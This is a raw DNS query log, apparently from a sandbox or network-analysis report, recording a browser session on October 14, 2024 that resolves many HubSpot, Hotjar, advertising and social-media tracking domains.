                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.040106058 CEST192.168.2.71.1.1.10x9773Standard query (0)js.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.040699959 CEST192.168.2.71.1.1.10x1ab0Standard query (0)app.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.041330099 CEST192.168.2.71.1.1.10x568fStandard query (0)app.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.124448061 CEST192.168.2.71.1.1.10xdccfStandard query (0)static.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.124771118 CEST192.168.2.71.1.1.10xd132Standard query (0)static.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:52.701586962 CEST192.168.2.71.1.1.10x6602Standard query (0)forms-na1.hsforms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:52.701745033 CEST192.168.2.71.1.1.10x1dafStandard query (0)forms-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.142258883 CEST192.168.2.71.1.1.10x73a3Standard query (0)cta-service-cms2.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.142594099 CEST192.168.2.71.1.1.10xb8dcStandard query (0)cta-service-cms2.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.157963991 CEST192.168.2.71.1.1.10xf9f4Standard query (0)js.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.158108950 CEST192.168.2.71.1.1.10xb67eStandard query (0)js.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.160113096 CEST192.168.2.71.1.1.10xaa97Standard query (0)js.hscollectedforms.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.160851002 CEST192.168.2.71.1.1.10xd3a8Standard query (0)js.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.167804956 CEST192.168.2.71.1.1.10x2196Standard query (0)js.hsleadflows.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.168060064 CEST192.168.2.71.1.1.10x4913Standard query (0)js.hsleadflows.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.172708035 CEST192.168.2.71.1.1.10x437cStandard query (0)js.usemessages.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.172861099 CEST192.168.2.71.1.1.10x7926Standard query (0)js.usemessages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.173930883 CEST192.168.2.71.1.1.10x5187Standard query (0)js.hsadspixel.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.174385071 CEST192.168.2.71.1.1.10x2c87Standard query (0)js.hsadspixel.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.178769112 CEST192.168.2.71.1.1.10x5fe9Standard query (0)js.hs-banner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.178967953 CEST192.168.2.71.1.1.10x7388Standard query (0)js.hs-banner.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.184576035 CEST192.168.2.71.1.1.10xb651Standard query (0)js.hs-analytics.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.184847116 CEST192.168.2.71.1.1.10x2cb5Standard query (0)js.hs-analytics.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.185713053 CEST192.168.2.71.1.1.10xb094Standard query (0)script.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.186144114 CEST192.168.2.71.1.1.10x2001Standard query (0)script.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.232878923 CEST192.168.2.71.1.1.10x8943Standard query (0)ws.hotjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.233069897 CEST192.168.2.71.1.1.10xcfStandard query (0)ws.hotjar.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.313064098 CEST192.168.2.71.1.1.10x5a02Standard query (0)content.hotjar.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.313452005 CEST192.168.2.71.1.1.10x1f7dStandard query (0)content.hotjar.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.331506968 CEST192.168.2.71.1.1.10x8979Standard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.427012920 CEST192.168.2.71.1.1.10x8164Standard query (0)forms.hscollectedforms.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.427208900 CEST192.168.2.71.1.1.10x188eStandard query (0)forms.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.464092016 CEST192.168.2.71.1.1.10xd06eStandard query (0)forms-na1.hsforms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.464246988 CEST192.168.2.71.1.1.10x2a5bStandard query (0)forms-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.928524971 CEST192.168.2.71.1.1.10x8012Standard query (0)perf-na1.hsforms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.928697109 CEST192.168.2.71.1.1.10xd1f9Standard query (0)perf-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.432821035 CEST192.168.2.71.1.1.10x4567Standard query (0)forms.hsforms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.432965994 CEST192.168.2.71.1.1.10x54b4Standard query (0)forms.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.540093899 CEST192.168.2.71.1.1.10x5659Standard query (0)cta-service-cms2.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.540220022 CEST192.168.2.71.1.1.10x805aStandard query (0)cta-service-cms2.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.558459044 CEST192.168.2.71.1.1.10xbdeStandard query (0)forms.hscollectedforms.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.558600903 CEST192.168.2.71.1.1.10xa402Standard query (0)forms.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.940506935 CEST192.168.2.71.1.1.10x47fcStandard query (0)perf-na1.hsforms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.940661907 CEST192.168.2.71.1.1.10xac77Standard query (0)perf-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.942995071 CEST192.168.2.71.1.1.10xb7c2Standard query (0)content.hotjar.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:54.943315029 CEST192.168.2.71.1.1.10xe928Standard query (0)content.hotjar.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.153867006 CEST192.168.2.71.1.1.10xf5f0Standard query (0)track.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.153997898 CEST192.168.2.71.1.1.10x2920Standard query (0)track.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.181397915 CEST192.168.2.71.1.1.10x9274Standard query (0)forms.hsforms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.181817055 CEST192.168.2.71.1.1.10xc6daStandard query (0)forms.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.258274078 CEST192.168.2.71.1.1.10xe217Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.258425951 CEST192.168.2.71.1.1.10xdaaeStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.782093048 CEST192.168.2.71.1.1.10xa9cdStandard query (0)track.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:55.782507896 CEST192.168.2.71.1.1.10x3fa8Standard query (0)track.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.333055019 CEST192.168.2.71.1.1.10x9128Standard query (0)forms.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.333432913 CEST192.168.2.71.1.1.10x9897Standard query (0)forms.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.578320980 CEST192.168.2.71.1.1.10xa281Standard query (0)api.hubapi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.578500032 CEST192.168.2.71.1.1.10x8b04Standard query (0)api.hubapi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.579022884 CEST192.168.2.71.1.1.10xed60Standard query (0)s.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.579164028 CEST192.168.2.71.1.1.10x1a43Standard query (0)s.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.998229980 CEST192.168.2.71.1.1.10xc58aStandard query (0)forms.hubspot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:03.998477936 CEST192.168.2.71.1.1.10x3caStandard query (0)forms.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.243546009 CEST192.168.2.71.1.1.10x9678Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.243758917 CEST192.168.2.71.1.1.10x2c50Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.244235039 CEST192.168.2.71.1.1.10x448eStandard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.244235039 CEST192.168.2.71.1.1.10x3845Standard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.245162010 CEST192.168.2.71.1.1.10x498cStandard query (0)api.hubapi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.245162010 CEST192.168.2.71.1.1.10x9928Standard query (0)api.hubapi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.959151030 CEST192.168.2.71.1.1.10x3412Standard query (0)tools.luckyorange.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.959151030 CEST192.168.2.71.1.1.10xb3ffStandard query (0)tools.luckyorange.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.960529089 CEST192.168.2.71.1.1.10x946eStandard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.960529089 CEST192.168.2.71.1.1.10x7239Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.963212013 CEST192.168.2.71.1.1.10xbb8bStandard query (0)js.hs-scripts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.963480949 CEST192.168.2.71.1.1.10xf8bfStandard query (0)js.hs-scripts.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.969487906 CEST192.168.2.71.1.1.10x4a23Standard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.969674110 CEST192.168.2.71.1.1.10xb4afStandard query (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.971910000 CEST192.168.2.71.1.1.10xef26Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:04.972052097 CEST192.168.2.71.1.1.10x6512Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.315150023 CEST192.168.2.71.1.1.10x5fbaStandard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.315598965 CEST192.168.2.71.1.1.10x3f19Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.790972948 CEST192.168.2.71.1.1.10x17fdStandard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.791520119 CEST192.168.2.71.1.1.10xc158Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.840413094 CEST192.168.2.71.1.1.10xb067Standard query (0)d.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.841393948 CEST192.168.2.71.1.1.10x1a4eStandard query (0)d.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.845078945 CEST192.168.2.71.1.1.10x998cStandard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:05.845709085 CEST192.168.2.71.1.1.10xa3e3Standard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.050849915 CEST192.168.2.71.1.1.10xa248Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.051558971 CEST192.168.2.71.1.1.10xb96Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.055408001 CEST192.168.2.71.1.1.10xa01Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.093472958 CEST192.168.2.71.1.1.10x24d7Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.471381903 CEST192.168.2.71.1.1.10x5517Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.472074986 CEST192.168.2.71.1.1.10x6dbbStandard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.518969059 CEST192.168.2.71.1.1.10xa88bStandard query (0)settings.luckyorange.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.519503117 CEST192.168.2.71.1.1.10x8246Standard query (0)settings.luckyorange.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.820664883 CEST192.168.2.71.1.1.10x7725Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:06.820862055 CEST192.168.2.71.1.1.10xbbc2Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.166805983 CEST192.168.2.71.1.1.10x15faStandard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.167310953 CEST192.168.2.71.1.1.10x42cStandard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.185116053 CEST192.168.2.71.1.1.10x256eStandard query (0)www.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:07.185249090 CEST192.168.2.71.1.1.10xcc49Standard query (0)www.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.113440037 CEST192.168.2.71.1.1.10x7c07Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.113903046 CEST192.168.2.71.1.1.10x2488Standard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.307682991 CEST192.168.2.71.1.1.10x6e1Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.308223009 CEST192.168.2.71.1.1.10x5d24Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.321686029 CEST192.168.2.71.1.1.10xb6eeStandard query (0)s.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.322191000 CEST192.168.2.71.1.1.10xe7b3Standard query (0)s.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.341223955 CEST192.168.2.71.1.1.10xb4bfStandard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.341747046 CEST192.168.2.71.1.1.10x9732Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.349154949 CEST192.168.2.71.1.1.10x41dfStandard query (0)js.hs-scripts.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.349374056 CEST192.168.2.71.1.1.10x520fStandard query (0)js.hs-scripts.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.353198051 CEST192.168.2.71.1.1.10x645aStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.353585005 CEST192.168.2.71.1.1.10xfd13Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.402354002 CEST192.168.2.71.1.1.10xb798Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.402678013 CEST192.168.2.71.1.1.10xe0bdStandard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.418343067 CEST192.168.2.71.1.1.10x35c1Standard query (0)tools.luckyorange.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.419167995 CEST192.168.2.71.1.1.10x8523Standard query (0)tools.luckyorange.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425144911 CEST192.168.2.71.1.1.10xbdf5Standard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.425587893 CEST192.168.2.71.1.1.10x29b3Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.506369114 CEST192.168.2.71.1.1.10xa72fStandard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.507132053 CEST192.168.2.71.1.1.10xed4eStandard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.546565056 CEST192.168.2.71.1.1.10x1cb6Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:08.560103893 CEST192.168.2.71.1.1.10x1110Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.206733942 CEST192.168.2.71.1.1.10x63ddStandard query (0)d.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.207290888 CEST192.168.2.71.1.1.10xa407Standard query (0)d.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.221934080 CEST192.168.2.71.1.1.10x5736Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.228652954 CEST192.168.2.71.1.1.10x841Standard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.262121916 CEST192.168.2.71.1.1.10xe06eStandard query (0)settings.luckyorange.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.262434959 CEST192.168.2.71.1.1.10x1844Standard query (0)settings.luckyorange.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.277982950 CEST192.168.2.71.1.1.10x7f40Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:09.278446913 CEST192.168.2.71.1.1.10xc2d1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.105468988 CEST192.168.2.71.1.1.10x26c4Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.106100082 CEST192.168.2.71.1.1.10xf64fStandard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.162060976 CEST192.168.2.71.1.1.10xa088Standard query (0)p.adsymptotic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.183512926 CEST192.168.2.71.1.1.10x6c4eStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.183746099 CEST192.168.2.71.1.1.10x1df8Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.198538065 CEST192.168.2.71.1.1.10x43c3Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:11.198726892 CEST192.168.2.71.1.1.10xdaaeStandard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.034087896 CEST192.168.2.71.1.1.10x15dStandard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.034213066 CEST192.168.2.71.1.1.10x331dStandard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.038407087 CEST192.168.2.71.1.1.10xa33dStandard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.038556099 CEST192.168.2.71.1.1.10x4290Standard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.050519943 CEST192.168.2.71.1.1.10x710dStandard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.050885916 CEST192.168.2.71.1.1.10xa3eStandard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.052041054 CEST192.168.2.71.1.1.10x106cStandard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.052195072 CEST192.168.2.71.1.1.10x5621Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.066446066 CEST192.168.2.71.1.1.10x8652Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.066617966 CEST192.168.2.71.1.1.10x2574Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.091361046 CEST192.168.2.71.1.1.10x49c8Standard query (0)idsync.rlcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.091658115 CEST192.168.2.71.1.1.10x88e0Standard query (0)idsync.rlcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.790507078 CEST192.168.2.71.1.1.10x19f3Standard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:12.790671110 CEST192.168.2.71.1.1.10x53ebStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.167128086 CEST192.168.2.71.1.1.10xeebbStandard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.167262077 CEST192.168.2.71.1.1.10xe3ddStandard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.225106955 CEST192.168.2.71.1.1.10xd5a9Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.225272894 CEST192.168.2.71.1.1.10x90c9Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.286905050 CEST192.168.2.71.1.1.10x6b23Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.287095070 CEST192.168.2.71.1.1.10x12cStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.303670883 CEST192.168.2.71.1.1.10x3e71Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:13.303843021 CEST192.168.2.71.1.1.10x76c2Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.111869097 CEST192.168.2.71.1.1.10xd53Standard query (0)sync.outbrain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:13:14.112073898 CEST192.168.2.71.1.1.10xae7cStandard query (0)sync.outbrain.com65IN (0x0001)false
